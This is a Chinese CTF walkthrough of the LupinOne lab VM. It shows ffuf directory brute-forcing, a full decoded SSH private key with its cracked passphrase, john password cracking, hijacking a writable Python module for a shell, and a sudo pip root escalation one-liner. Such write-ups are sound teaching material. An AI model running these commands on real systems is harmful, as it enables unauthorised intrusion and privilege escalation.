Kali 的IP地址：192.168.127.139

靶机的IP地址：192.168.127.142

目录

一、信息搜集

1.1、扫描主机口

1.2、扫描端口

二、Web漏洞利用

2.1、目录遍历

2.2、破解私钥破解密码

2.3、尝试登陆

三、提权

3.1、提权到arsene

3.2、提权到root

一、信息搜集

1.1、扫描主机口

1.2、扫描端口

发现目标靶机开放了 22 (ssh) 、80（http）端口，我们默认访问80端口

http://192.168.127.142：80

发现页面没有啥东西，尝试看一下源代码

检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子，不要放弃。”

看另一个22端口是ssh的,现在没有账号密码无法使用。

二、Web漏洞利用

2.1、目录遍历

我们先扫描一下靶机的网站目录

发现有robots.txt，我们访问一下，发现有~myfiles文件夹，还有俩个名词，百度一下

试着访问~myfile这个文件夹，发现页面就是404，我们可以查看一下源代码，下面还有一个注释的话“你可以的，继续努力。”

让我们继续努力，就是暗示我们还有别的东西，紧接着我们尝试暴力破解，这里推荐使用ffuf工具暴力破解目录，kali自带的ffuf扫描速度贼快

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.127.142/~FUZZ'

参数解释：-c 有颜色输出-w 指定字典-u 指定暴力破解的目录，FUZZ 就是暴力破解的目录

看见是一个~secret文件，我们访问一下

访问：http://192.168.127.142/~secret/

Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.I’m smart I know that.Any problem let me knowYour best friend icex64你好朋友，我很高兴你找到了我的秘密目录，我这样创建的，以与你分享我的ssh私钥文件，它就藏在这里的某个地方，这样黑客就不会找到它，用快速通道破解我的密码。我很聪明，我知道。有问题尽管来找我你最好的朋友icex64

我们猜测用户名是不是 icex64，用ssh私钥登陆，所以这里暴露了一个用户名 icex64 ，并且内容中提到该目录下有一个ssh私匙文件，这里可能需要暴力破解了

2.2、破解私钥破解密码

暴力破解文件继续使用ffuf破解，ffuz这个工具是可以自己选择后缀名的

尝试使用 kali 中的字典暴力破解

ffuf -u "http://192.168.127.142/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

扫描出来一个文件，我们接着访问一下

发现是一串乱码，看起来很像base加密，我们直接去base全家桶一个一个解密

发现base58可以解出来

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

我们将这个解密的文件保存下来（文件命名为ssh_txt），使用ssh密钥登陆，发现还需要一个密码，另外一个密码可以通过这个保存的文件密钥爆破出来

先用ssh2john.py 将ssh_txt更改为john可以识别的格式

命令：/usr/share/john/ssh2john.py ssh_txt > hash

之前~secret文件有叫我们使用fasttrack字典去爆破

然后利用john对 ssh_txt进行爆破。还原密码 该字典文件应该是kali上自带的字典.

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

得到用户：icex64的密码是：P@55w0rd!

2.3、尝试登陆

尝试使用私钥+密码登陆到系统中

尝试ssh登录（ icex64、P@55w0rd!）

ssh icex64@192.168.127.142 -i ssh_txt

登陆成功，查看家目录,发现有一个文件user.txt，得到一个flag

三、提权

3.1、提权到arsene

执行sudo -l发现arsene用户可以免密以root身份执行一个py脚本

User icex64 may run the following commands on LupinOne:(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

紧接着我们查看一下这个文件，发现里面引入了一个包，我们可以看到heist.py脚本本身没有什么代码，但导入了一个模块：webbrowser

查看webbrowser.py脚本，发现有导入os模块

查看文件权限，发现可以修改

然后在上面插入一行进入bash的命令，插入os.system ("/bin/bash") 获取shell

重新切换shell，成功获取到arsene权限

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

3.2、提权到root

再次执行sudo -l发现可以以root身份免密执行pip，

然后我们使用pip进行提权，最终拿到flag，复制下面代码在 shell 中执行，成功提权，在 /root 目录下找到了flag（root.txt）

TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo pip install $TF

总结：

该靶机整体简单，重点在于ffuf 工具暴力破解目录，ssh2john工具的使用，使用 john 破解私钥，紧接着sudo：pip提权